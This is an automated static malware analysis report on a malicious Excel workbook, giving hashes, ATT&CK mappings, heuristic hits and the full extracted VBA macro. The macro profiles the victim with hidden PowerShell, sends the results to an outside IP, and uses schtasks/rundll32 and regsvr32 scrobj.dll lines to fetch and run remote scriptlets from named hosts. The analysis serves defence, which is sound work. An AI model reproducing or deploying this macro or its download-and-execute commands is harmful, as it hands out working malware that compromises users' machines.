Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8fb634785c78cb4b…

MALICIOUS

Office (OOXML)

22.7 KB Created: 2018-09-16 22:52:21 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2019-02-26
MD5: 3c5926b63b8b7df78ae4d493bdc9b9fa SHA-1: 486ccf480d6c5251eb09f25719b6a30c87a7b485 SHA-256: 8fb634785c78cb4b83ac2f5ae394d90a338efbcad2dc4e2a5cf4e26e106774e4
510 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains a Workbook_Open VBA macro that utilizes WScript.Shell and CreateObject to execute PowerShell commands. The script attempts to download a payload from 'http://18.224.199.137/check.php?' by constructing a GET request. The PowerShell commands are obfuscated but appear to be gathering system information. The presence of multiple high and critical heuristics related to VBA, WScript.Shell, PowerShell, and LOLBins strongly indicates malicious intent.

Heuristics 11

  • ClamAV: Xls.Malware.Pwshell-6819163-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Pwshell-6819163-0
  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        'Run a shell command, returning the output as a string
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim oShell As Object
    Set oShell = CreateObject("WScript.Shell")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        'Get boxed
    pc = ShellRun("powershell -nop -w hidden -c (ps).count")
    upc = ShellRun("powershell -nop -w hidden -c get-process | sort-object | select -exp processname | get-unique | measure | select -exp count")
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        oShell.Run "schtasks /create /sc MINUTE /tn ""wub wub"" /tr " & _
               """rundll32 javascript:\""\..\mshtml,RunHTMLApplication \"";document.write();try{GetObject(\""script:http://update.bongos-dropbox.com/images/rtf/logo33_bak.ico\"");}catch(e){};window.close()""" & _
               " /mo 10 /F""", 0
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim objHTTP, res
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    objHTTP.Open "GET", "http://18.224.199.137/check.php?" & pb, False
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        oShell.Run "schtasks /create /sc MINUTE /tn ""wub wub"" /tr " & _
               """rundll32 javascript:\""\..\mshtml,RunHTMLApplication \"";document.write();try{GetObject(\""script:http://update.bongos-dropbox.com/images/rtf/logo33_bak.ico\"");}catch(e){};window.close()""" & _
               " /mo 10 /F""", 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Workbook_Open()
    On Error Resume Next
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://18.224.199.137/check.php In document text (OOXML body / shared strings)
    • http://update.bongos-dropbox.com/images/rtf/logo33_bak.ico\In document text (OOXML body / shared strings)
    • http://update.upload-dropbox.com/images/rtf/logo33.icoIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3568 bytes
SHA-256: 8aff54f291e4928f1b3c90dc02c0ee7bf342511ca8e41370da7022ff052745d1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    On Error Resume Next
    pb = GetInputs()
    Dim objHTTP, res
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    objHTTP.Open "GET", "http://18.224.199.137/check.php?" & pb, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
    objHTTP.send (pb & o)
    res = objHTTP.responseText
    Set objHTTP = Nothing
    Set res = Nothing
End Sub


Public Function ShellRun(sCmd As String) As String

    'Run a shell command, returning the output as a string

    Dim oShell As Object
    Set oShell = CreateObject("WScript.Shell")

    'run command
    Dim oExec As Object
    Dim oOutput As Object
    Set oExec = oShell.Exec(sCmd)
    Set oOutput = oExec.StdOut

    'handle the results as they are written to and read from the StdOut object
    Dim s As String
    Dim sLine As String
    While Not oOutput.AtEndOfStream
        sLine = oOutput.ReadLine
        If sLine <> "" Then s = s & sLine & vbCrLf
    Wend

    ShellRun = s

End Function

Function GetInputs()
    Dim pc, upc, u, pb, uf As String
    
    'Get boxed
    pc = ShellRun("powershell -nop -w hidden -c (ps).count")
    upc = ShellRun("powershell -nop -w hidden -c get-process | sort-object | select -exp processname | get-unique | measure | select -exp count")
    
    'Getting user counts
    u = ShellRun("powershell -nop -w hidden -c (Get-WmiObject Win32_Process -ComputerName . | ?{ $_.ProcessName -Match 'csrss'}).GetOwner().User")
    u2 = ShellRun("powershell -nop -w hidden -c (Get-WmiObject Win32_Process -ComputerName . | ?{ $_.ProcessName -Match 'explorer'}).GetOwner().User")

    
    
    pc = CInt(pc)
    upc = CInt(upc)
    
    If Len(u) > 0 Then
        uf = 4
    End If
    
    If Len(u2) > 0 Then
        uf = 1
    End If
        
    ActiveWorkbook.Sheets("Sheet1").Range("F4").Value = uf
    ActiveWorkbook.Sheets("Sheet1").Range("D4").Value = pc
    ActiveWorkbook.Sheets("Sheet1").Range("E4").Value = upc

   
    usr = ActiveWorkbook.Sheets("Sheet1").Range("F4").Value
    
    pb = "pc=" & pc & "&upc=" & upc & "&usr=" & uf
    
    GetInputs = pb
    
End Function

Sub Workbook_Close()

    Dim oShell, office_text As String

    On Error Resume Next
    Set oShell = CreateObject("WSCript.shell")
    oShell.Run "schtasks /create /sc MINUTE /tn ""wub wub"" /tr " & _
               """rundll32 javascript:\""\..\mshtml,RunHTMLApplication \"";document.write();try{GetObject(\""script:http://update.bongos-dropbox.com/images/rtf/logo33_bak.ico\"");}catch(e){};window.close()""" & _
               " /mo 10 /F""", 0
    oShell.Run "regs" & _
               "vr32.exe /s /n /u /i:http://update.upload-dropbox.com/images/rtf/logo33.ico scro" & _
               "bj.dll", 0
    Set oShell = Nothing
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 24064 bytes
SHA-256: 49ded032e05409450c9258e35937b67d1e6ec2521bd3badd7ce96a7f0890796a
Detection
ClamAV: Xls.Malware.Pwshell-6819163-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.